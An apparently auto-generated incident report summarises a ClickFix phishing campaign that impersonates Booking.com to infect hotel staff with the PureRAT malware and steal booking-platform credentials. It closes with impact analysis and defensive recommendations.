Full Report
Cybersecurity researchers have called attention to a massive phishing campaign targeting the hospitality industry that lures hotel managers to ClickFix-style pages and harvest their credentials by deploying malware like PureRAT. "The attacker's modus operandi involved using a compromised email account to send malicious messages to multiple hotel establishments," Sekoia said. "This campaign
Analysis Summary
# Incident Report: Massive ClickFix Phishing Campaign Targeting Hospitality Credentials
## Executive Summary
A massive, ongoing phishing campaign has been identified targeting the hospitality industry, specifically hotel managers, by impersonating Booking.com. Attackers use compromised email accounts to send spear-phishing messages that redirect victims through a redirection chain leveraging the ClickFix social engineering tactic to deploy the PureRAT malware. The primary goal is the theft of credentials for booking platforms (like Booking.com or Expedia) for resale or use in subsequent fraud schemes.
## Incident Details
- **Discovery Date:** At least since April 2025 (Campaign active since observations began). Verified operational as of early October 2025.
- **Incident Date:** Active since at least April 2025.
- **Affected Organization:** Multiple hotel establishments globally.
- **Sector:** Hospitality (Hotels, Booking Platform Administrators).
- **Geography:** Multiple countries (implied by global targeting of hotel chains).
## Timeline of Events
### Initial Access
- **Date/Time:** Active since at least April 2025.
- **Vector:** Spear-phishing emails sent from a compromised legitimate email account.
- **Details:** Emails impersonate Booking.com, tricking recipients into clicking malicious links that initiate a redirection chain leading to a ClickFix-style page, often presenting a fake reCAPTCHA challenge.
### Lateral Movement
- **Details:** Following successful PureRAT installation, the malware supports features indicative of a Remote Access Trojan (RAT), including remote command execution, suggesting potential for lateral movement across the compromised network via remote access capabilities.
### Data Exfiltration/Impact
- **Details:** Primary impact is credential theft (login/password pairs, authentication cookies) for booking extranet accounts. Secondary impact involves fraudulent activity targeting hotel customers via WhatsApp or email, seeking banking card details under the pretext of reservation verification. PureRAT itself supports data exfiltration features.
### Detection & Response
- **How it was discovered:** Identified and documented by cybersecurity researchers (Sekoia).
- **Response actions taken:** Not explicitly detailed in the provided text, but internal investigation, malware analysis, and creation of Indicators of Compromise (IOCs) would be standard response measures.
## Attack Methodology
- **Initial Access:** Spear-phishing emails impersonating Booking.com, directing victims to malicious ClickFix pages.
- **Persistence:** Established via the deployment of PureRAT, specifically by creating a **Run registry key** on the host system.
- **Privilege Escalation:** Not explicitly detailed, but DLL side-loading infection chain suggests the necessity of executing code with sufficient privileges to establish the registry key persistence.
- **Defense Evasion:** The malware (PureRAT) is protected with **.NET Reactor** to complicate reverse engineering. The infection chain involves an initial JavaScript check to see if the page is in an iframe before redirecting over HTTP.
- **Credential Access:** Theft of credentials for booking platforms (Booking.com/Expedia extranets) via downloaded binary/infostealer components associated with PureRAT execution. Fraudulent landing pages mimicking booking sites are also used separately to harvest banking card details from customers.
- **Discovery:** Indirectly implied through the RAT functionality of PureRAT, which supports remote system command execution, necessary for further reconnaissance.
- **Lateral Movement:** Supported by PureRAT's remote execution and proxying capabilities (though not detailed how the traffic moved).
- **Collection:** System information gathering (via PowerShell), keylogging, and general data theft enabled by the RAT capabilities.
- **Exfiltration:** Capability exists within PureRAT (explicitly listed feature).
- **Impact:** Compromise of management access to booking platforms, sale of credentials on cybercrime forums (e.g., LolzTeam), and direct customer fraud.
## Impact Assessment
- **Financial:** High potential for financial losses due to the sale of high-value booking extranet credentials and losses incurred from executed fraud against hotel patrons.
- **Data Breach:** Credentials (login/password pairs, authentication cookies) for Booking.com/Expedia extranet accounts. Payment card information from hotel customers targeted in secondary scams.
- **Operational:** Potential disruption to hotel management operations if systems are controlled by the RAT.
- **Reputational:** Severe reputational damage stemming from compromised customer data and fraudulent activities publicized under the guise of major booking platforms.
## Indicators of Compromise
- **Network indicators:** Defanged URLs leading to ClickFix-style pages (Specific URLs redacted in source).
- **File indicators:** ZIP archive containing the PureRAT binary; PureRAT executable (protected by .NET Reactor).
- **Behavioral indicators:** PowerShell command execution gathering system info and downloading archives; establishment of persistence via a **Run registry key**; DLL side-loading technique used for PureRAT loading.
## Response Actions
Since the operational details of internal response actions are not provided in the article, general required actions based on the observed threat profile are listed:
- **Containment:** Isolating any identified compromised hosts. Blocking network traffic associated with observed PureRAT C2 infrastructure (if IPs/domains were identified). Disabling access for any credentials known to be compromised.
- **Eradication:** Removing PureRAT persistence mechanisms (registry keys) and eliminating the malware binary across all affected endpoints.
- **Recovery:** Forcing password resets for all potentially affected administrator accounts; notifying customers potentially impacted by secondary phishing scams.
## Lessons Learned
- The use of compromised legitimate email accounts greatly increases the initial trust factor, bypassing basic perimeter defenses.
- Reliance on services like Booking.com creates a concentrated, lucrative target for attackers aiming to steal high-value platform credentials.
- Multi-stage infection chains involving JavaScript redirection, anti-iframe checks, and subsequent PowerShell execution successfully bypass straightforward antivirus/email scanning.
## Recommendations
- Implement strict **Multi-Factor Authentication (MFA)** across all sensitive management portals, especially Booking.com extranet and email infrastructure.
- Enhance email security defenses to aggressively inspect links for redirection chains characteristic of ClickFix/social engineering tactics.
- Conduct mandatory focused security awareness training for hotel staff, specifically covering phishing attempts impersonating booking platforms and requests for external "reCAPTCHA" or verification steps.
- Implement **Endpoint Detection and Response (EDR)** capable of detecting behavioral anomalies such as PowerShell downloading executables or the creation of persistence keys in the Run registry hive.